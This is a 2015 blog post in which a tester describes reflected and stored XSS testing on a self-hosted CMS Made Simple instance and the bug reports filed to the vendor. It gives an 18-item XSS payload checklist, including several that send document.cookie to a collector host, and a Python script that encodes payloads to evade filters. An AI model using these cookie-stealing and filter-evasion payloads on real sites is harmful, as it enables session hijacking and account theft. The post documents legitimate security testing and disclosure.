Monday, May 11, 2015

XSS Reflected and Stored Testing with Script to Encode HTML

I was testing various methods of XSS and from the list below I found some that would work and some that would not.  Most of them in the list below I tested on an installed instance of "CMS Made Simple" on an Apache server I setup.

After testing for XSS on the instance I had installed, I submitted to them bugs #10511, #10512, #10513, #10514, #10515, #10517, #10518, #10519, and #10520.  Most of the bugs they felt were trivial because it was after an admin had accessed the CMS.  The one stored XSS that I found in the documentation I provided them in a comment caused stored XSS.

I used the XSS Filter Evasion Cheat Sheet and the Web Application Hackers Handbook version 2 to generate the following list:

### XSS Manual Testing Checklist ###
1. <script>alert('XSS');</script>
2. <script>alert("XSS");</script>
3. <script type='text/javascript'>alert('XSS');</script>
4. <script type="text/javascript">alert("XSS");</script>
5. %3cscript>alert("XSS");%3c/script>
6. &#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
7. &#0000060;&#0000115;&#0000099;&#0000114;&#0000105;&#0000112;&#0000116;&#0000062;&#0000097;&#0000108;&#0000101;&#0000114;&#0000116;&#0000040;&#0000049;&#0000041;&#0000060;&#0000047;&#0000115;&#0000099;&#0000114;&#0000105;&#0000112;&#0000116;&#0000062;
8. <script>alert(1)</script>
9. &#0000060&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000062&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000049&#0000041&#0000060&#0000047&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000062
10. %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
11. <script>var+i=new+Image;+i.src='http://127.0.0.1:8095/test.html?'%2bdocument.cookie;</script>
12. <script>var+i=new+Image;+i.src="http://127.0.0.1:8095/test.html";i+=document.cookie;</script>
13. <a href="#" onclick="window.location='http://127.0.0.1:8095/stole.cgitext='+escape(document.cookie);return false;">Click here!</a>
14. <script>var+i=new Image;+i.src="http://127.0.0.1:8095/test.html?"%2bencodeURIComponent(document.cookie);</script>
15. <script>var%2bi=new%20Image;%2bi.src="http://127.0.0.1:8095/test.html?"%2bencodeURIComponent(document.cookie);</script>
16. <script type="text/javascript">alert(document.cookie);</script>
17. <script type="text/javascript">document.write('http://127.0.0.1:8095/test.html?'+document.cookie);</script>
18. <script type="text/javascript">document.write('<img src=http://127.0.0.1:8095/test.html?'+document.cookie+'>');</script>

To create the 6th through 10th items I created the following python script to encode any html that is input.

#!/usr/bin/python

import os, sys

print "Input below the string to encode in HTML Decimal: "
valueInput = raw_input("> ")

valueOutDec = ''
valueOutDecLongSemi = ''
valueOutDecLong = ''
valueOutHex = ''

# <script>alert(String.fromCharCode(88,83,83));</script>  # If URL Encoded works
# <script>alert('XSS');</script> # If URL Encoded works

for char in valueInput:
# HTML Decimal Encoding
valueOutDec += "&#" + str(ord(char)) + ";"
# HTML Decimal Encoding Long with and without semi-colon
if len(str(ord(char))) == 2:
valueOutDecLongSemi += "&#00000" + str(ord(char)) + ";"
valueOutDecLong += "&#00000" + str(ord(char))
else:
valueOutDecLongSemi += "&#0000" + str(ord(char)) + ";"
valueOutDecLong += "&#0000" + str(ord(char))
# Hex Encoding
valueOutHex += "%" + str(format(ord(char), 'x'))

print
print "HTML Decimal Encoding"
print valueOutDec
print
print "HTML Decimal Encoding Long with semi-colon"
print valueOutDecLongSemi
print 
print "HTML Decimal Encoding Long"
print valueOutDecLong
print
print "Hex Encoding with leading %"
print valueOutHex

No comments:

Post a Comment

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...